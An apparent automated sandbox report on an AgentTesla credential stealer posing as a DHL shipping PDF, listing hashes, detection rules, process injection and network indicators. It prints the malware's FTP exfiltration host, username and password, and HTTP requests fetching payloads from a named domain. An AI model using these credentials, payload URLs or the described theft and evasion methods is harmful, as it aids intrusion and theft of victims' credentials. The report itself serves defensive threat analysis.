
Windows Analysis Report
DHL Shipping Documents 0016229753_PDF.exe

Overview

General Information

Sample name: DHL Shipping Documents 0016229753_PDF.exe
Analysis ID: 1486782
MD5: c9bec29f669d714cd80e368748d7024c
SHA1: 26cbf10c3901a2d9d1023daca9d1e70212c52ae6
SHA256: 80c5e03de930503d62103dea57d6590454e442612a394a2b235eb614746e2b3a
Tags: AgentTesla, DHL, exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample has a suspicious name (potential lure to open the executable)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • DHL Shipping Documents 0016229753_PDF.exe (PID: 5836 cmdline: "C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe" MD5: C9BEC29F669D714CD80E368748D7024C)
    • MSBuild.exe (PID: 5764 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.wapination.net", "Username": "pop@wapination.net", "Password": "sync@#1235"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Source | Rule | Description | Author | Strings
00000003.00000002.2592099804.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000001.00000002.1416664051.0000000003281000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000001.00000002.1416664051.0000000003281000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000003.00000002.2591102452.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000003.00000002.2591102452.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
Source | Rule | Description | Author | Strings
1.2.DHL Shipping Documents 0016229753_PDF.exe.32b7d70.2.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
1.2.DHL Shipping Documents 0016229753_PDF.exe.32b7d70.2.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
1.2.DHL Shipping Documents 0016229753_PDF.exe.32b7d70.2.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
  • 0x318a3:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x31945:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x319cf:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x31a61:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x31acb:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x31b3d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x31bd3:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x31c63:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
1.2.DHL Shipping Documents 0016229753_PDF.exe.32b7d70.2.unpack | MALWARE_Win_AgentTeslaV2 | AgenetTesla Type 2 Keylogger payload | ditekSHen
  • 0x2ed90:$s2: GetPrivateProfileString
  • 0x2e49a:$s3: get_OSFullName
  • 0x2fa77:$s5: remove_Key
  • 0x2fc14:$s5: remove_Key
  • 0x30b16:$s6: FtpWebRequest
  • 0x31885:$s7: logins
  • 0x31e27:$s7: logins
  • 0x34b98:$s7: logins
  • 0x34c4a:$s7: logins
  • 0x36582:$s7: logins
  • 0x357ee:$s9: 1.85 (Hash, version 2, native byte-order)
3.2.MSBuild.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
                    No Sigma rule has matched
                    No Snort rule has matched
Timestamp: 2024-08-02T15:02:16.556150+0200
SID: 2855542
Source Port: 49709
Destination Port: 47808
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 2024-08-02T15:02:12.198468+0200
SID: 2803270
Source Port: 49707
Destination Port: 443
Protocol: TCP
Classtype: Potentially Bad Traffic

Timestamp: 2024-08-02T15:02:10.477622+0200
SID: 2803270
Source Port: 49706
Destination Port: 443
Protocol: TCP
Classtype: Potentially Bad Traffic

Timestamp: 2024-08-02T15:02:16.550510+0200
SID: 2855542
Source Port: 49709
Destination Port: 47808
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 2024-08-02T15:02:16.074554+0200
SID: 2029927
Source Port: 49708
Destination Port: 21
Protocol: TCP
Classtype: A Network Trojan was detected

                    AV Detection

Source: DHL Shipping Documents 0016229753_PDF.exe | Avira: detected
Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.wapination.net", "Username": "pop@wapination.net", "Password": "sync@#1235"}
Source: DHL Shipping Documents 0016229753_PDF.exe | ReversingLabs: Detection: 47%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: unknown | HTTPS traffic detected: 23.206.229.209:443 -> 192.168.2.9:49712 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 172.67.189.102:443 -> 192.168.2.9:49706 version: TLS 1.2
Source: DHL Shipping Documents 0016229753_PDF.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: `.Pdb/> source: MSBuild.exe, 00000003.00000002.2591555257.0000000000F11000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\cashout\Desktop\Outputs\Meazod.pdb source: DHL Shipping Documents 0016229753_PDF.exe
Source: Binary string: `.Pdb/ source: MSBuild.exe, 00000003.00000002.2591555257.0000000000F11000.00000004.00000020.00020000.00000000.sdmp
Source: global traffic | TCP traffic: 192.168.2.9:49709 -> 108.179.234.136:47808
Source: Joe Sandbox View | IP Address: 108.179.234.136
Source: Joe Sandbox View | IP Address: 172.67.189.102
Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View | JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | FTP traffic detected: 108.179.234.136:21 -> 192.168.2.9:49708 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 08:02. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 08:02. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 08:02. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Source: global traffic | HTTP traffic detected: GET /assuence/litesolidCha/Mindwall.bl HTTP/1.1 User-Agent: Mozilla/5.0 Host: investdirectinsurance.com Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /assuence/litesolidCha/Pano.bl HTTP/1.1 User-Agent: Mozilla/5.0 Host: investdirectinsurance.com Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.11
Source: unknown | TCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe | Code function: 1_2_00007FF886E32072 InternetReadFile
Source: global traffic | DNS traffic detected: DNS query: investdirectinsurance.com
Source: global traffic | DNS traffic detected: DNS query: ftp.wapination.net
Source: MSBuild.exe, 00000003.00000002.2592099804.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2592099804.0000000002D3C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ftp.wapination.net
Source: MSBuild.exe, 00000003.00000002.2592099804.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: MSBuild.exe, 00000003.00000002.2592099804.0000000002D3C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://wapination.net
Source: DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1416790317.00000000132E9000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1416664051.0000000003281000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2591102452.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/
Source: DHL Shipping Documents 0016229753_PDF.exe | String found in binary or memory: https://api.yookassa.ru/v3/
Source: DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1417803122.000000001C279000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://investdirectinsurance.com/
Source: DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1415854239.00000000015C6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://investdirectinsurance.com/J~%
Source: DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1415854239.00000000015C6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://investdirectinsurance.com/O~
Source: DHL Shipping Documents 0016229753_PDF.exe | String found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Mindwall.bl
Source: DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1415854239.00000000015C6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Mindwall.bl(t
Source: DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1415854239.00000000015C6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Mindwall.blwt
Source: DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1415854239.00000000015C6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Mindwall.bl~t
Source: DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1416664051.0000000003281000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1417803122.000000001C279000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Pano.bl
Source: DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1417803122.000000001C279000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Pano.bl&
Source: DHL Shipping Documents 0016229753_PDF.exe | String found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Pano.blsC:
Source: DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1417803122.000000001C279000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Pano.blx
Source: unknown | Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.raw.unpack, SKTzxzsJw.cs | .Net Code: Fe9wfWKc5

                    System Summary

Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.32b7d70.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.32b7d70.2.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.328f708.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.328f708.3.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.3293538.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.3293538.1.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.32b7d70.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.32b7d70.2.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: initial sample | Static PE information: Filename: DHL Shipping Documents 0016229753_PDF.exe
Source: DHL Shipping Documents 0016229753_PDF.exe | Static file information: Suspicious name
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe | Code function: 1_2_00007FF886E30FF2
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe | Code function: 1_2_00007FF886E31750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 3_2_01359BC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 3_2_01354A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 3_2_0135CE50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 3_2_01353E48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 3_2_01354190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 3_2_060C56E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 3_2_060C0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 3_2_060C3F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 3_2_060CDC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 3_2_060CBD08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 3_2_060C9AE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 3_2_060C2AF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 3_2_060C8B88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 3_2_060C324B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 3_2_060C5008
Source: DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1416790317.00000000132E9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename5e940590-bd07-4e56-ae86-61e052f8ff28.exe4 vs DHL Shipping Documents 0016229753_PDF.exe
Source: DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1416664051.0000000003281000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamegh2q.dll4 vs DHL Shipping Documents 0016229753_PDF.exe
Source: DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1416664051.0000000003281000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename5e940590-bd07-4e56-ae86-61e052f8ff28.exe4 vs DHL Shipping Documents 0016229753_PDF.exe
Source: DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1417477623.000000001BBC0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamegh2q.dll4 vs DHL Shipping Documents 0016229753_PDF.exe
Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.32b7d70.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.32b7d70.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.328f708.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.328f708.3.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.3293538.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.3293538.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.32b7d70.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.32b7d70.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.raw.unpack, 4JJG6X.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.raw.unpack, 8C78isHTVco.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.raw.unpack, CqSP68Ir.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.raw.unpack, CqSP68Ir.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: DHL Shipping Documents 0016229753_PDF.exe, Client.cs | Suspicious URL: 'https://api.yookassa.ru/v3/'
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/3@2/2
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\Mindwall[1].bl
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Mutant created: NULL
Source: DHL Shipping Documents 0016229753_PDF.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: DHL Shipping Documents 0016229753_PDF.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: DHL Shipping Documents 0016229753_PDF.exeReversingLabs: Detection: 47%
                    Source: unknownProcess created: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe "C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe"
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Section loaded: version.dll
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Section loaded: wininet.dll
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Section loaded: wldp.dll
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Section loaded: profapi.dll
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Section loaded: netutils.dll
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Section loaded: schannel.dll
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Section loaded: amsi.dll
